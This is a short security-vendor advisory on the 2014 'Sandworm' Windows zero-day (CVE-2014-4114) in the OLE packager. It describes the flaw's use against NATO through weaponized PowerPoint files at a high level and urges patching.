Microsoft has announced the discovery of a zero-day vulnerability affecting all supported versions of Microsoft Windows and Windows Server 2008 and 2012. Reports are also coming in that this specific vulnerability has been exploited and used in attacks against the North Atlantic Treaty Organization (NATO) and several European industries and sectors.
According to reports, this vulnerability (CVE-2014-4114) was exploited as part of a cyber-espionage campaign of attackers dubbed as the “Sandworm Team.” This particular vulnerability has allegedly been in use since August 2013, “mainly through weaponized PowerPoint documents.” Details of the vulnerability have been made available, including the following:
- This vulnerability exists in the OLE package manager in Microsoft Windows and Server.
- The OLE packager can download and execute INF files. “In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allow a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources.”
- If exploited, the vulnerability can allow an attacker to remotely execute arbitrary code.
Microsoft has announced that it will release a patch for this vulnerability as part of this month’s Patch Tuesday. We encourage both users and admins to immediately download and install the patches as soon as they are made available.
We are currently analyzing the related sample. We will update this entry as soon as more details and solutions are available.
Update as of October 15, 2014, 11:24 P.M. (PDT):
Further analysis of this zero-day vulnerability can be found in our entry, An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm.” You may also read the entry October 2014 Patch Tuesday Fixes Sandworm Vulnerability for information regarding the corresponding patch.